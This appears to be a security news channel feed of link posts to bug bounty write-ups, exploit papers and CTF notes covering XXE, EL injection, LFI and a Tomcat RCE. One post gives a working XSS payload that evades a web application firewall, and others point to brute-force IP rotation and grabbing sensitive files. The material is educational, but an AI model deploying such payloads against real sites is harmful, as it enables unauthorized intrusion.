Information Security
@sec_nerd_en
416 subscribers
Information Security News
We are @sec_nerd twin brother
Information Security
https://www.youtube.com/watch?v=Xwlp9OQGfvM
YouTube
Access Control Bypass | #bugbountypoc | @remonsec
Think out of the Box
Information Security
XSS payload WAF bypass
Hh'><script>alert(1)</script> = waf ❌
Hh'><marquee loop=1 width=0 onfinish=pr\u006fmpt`_Y000!_`>Y000</marquee> = waf bypassed ☑️
#payload #xss #waf #bypass
Information Security
https://mp.weixin.qq.com/s/OGdHSwqydiDqe-BUkheTGg
Weixin Official Accounts Platform
CVE-2020-9484 Tomcat RCE Vulnerability Analysis
Respect to threedr3am
Information Security
https://rawsec.ml/en/local-file-inclusion-remote-code-execution-vulnerability/
Information Security
http://www.madirish.net/401
www.madirish.net
Mad Irish :: PHP Null Byte Poisoning
Information Security
https://medium.com/@hakluke/sensitive-files-to-grab-in-windows-4b8f0a655f40
Medium
Sensitive Files to Grab in Windows
Scenario time — you’ve just found that you are able to access a whole Windows file system via a directory traversal vuln in a webapp. You…
Information Security
https://www.tooboat.com/?p=1657
Information Security
https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf
Information Security
https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html?m=1
Betterhacker
RCE in Hubspot with EL injection in HubL
This is the story of how I was able to get remote code execution on Hubspot's servers by exploiting a vulnerability in HubL expression la...
Information Security
local_dtd
#xxe
Information Security
https://medium.com/@lokeshdlk77/how-to-rotate-ip-address-in-brute-force-attack-e66407259212
Information Security
https://medium.com/@lokeshdlk77/csrf-email-confirmation-vulnerability-for-gmail-g-suite-in-facebook-5ab551a0a526
Medium
CSRF Email Confirmation Vulnerability for Gmail & G-Suite in Facebook
This post is about a bug that I found on Facebook which used to verify any new Gmail and G-Suite account with minimal Victim’s…
Information Security
https://www.exploit-db.com/docs/english/45374-xml-external-entity-injection---explanation-and-exploitation.pdf
Information Security
https://www.exploit-db.com/papers?author=9381#
Exploit-Db
Offensive Security’s Exploit Database Archive
Archived security papers and articles in various languages.
Information Security
https://github.com/c0ny1/xxe-lab
GitHub
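GitHub - c0ny1/xxe-lab: An XXE vulnerability demo with versions in various languages, including PHP, Java, Python and C#
An XXE vulnerability demo with versions in various languages, including PHP, Java, Python and C#. Contribute to c0ny1/xxe-lab development by creating an account on GitHub.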
Information Security
https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
Foxglovesecurity
What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability.
By @breenmachine What? The most underrated, underhyped vulnerability of 2015 has recently come to my attention, and I’m about to bring it to yours. No one gave it a fancy name, there were no …
Information Security
https://bhavukjain.com/blog/2020/05/30/zeroday-signin-with-apple/
Information Security
https://hg8.sh/posts/resolute/
hg8's Notes — My notes about infosec world. Pentest/Bug Bounty/CTF Writeups.
HackTheBox - Resolute
Resolute just retired on Hackthebox, it’s a medium difficulty Windows box. Still being a bit new to the Windows environment the enumeration process got a bit long and tedious for me at some point bu
Information Security
https://github.com/irsdl/top10webseclist
GitHub
GitHub - irsdl/top10webseclist: Top Ten Web Hacking Techniques List
Top Ten Web Hacking Techniques List. Contribute to irsdl/top10webseclist development by creating an account on GitHub.
Information Security
https://f4d3.io/xxe_wild/
h1{Error based XXE - bug bounty writeup} | f4d3
Welcome to the bourne again f4d3.io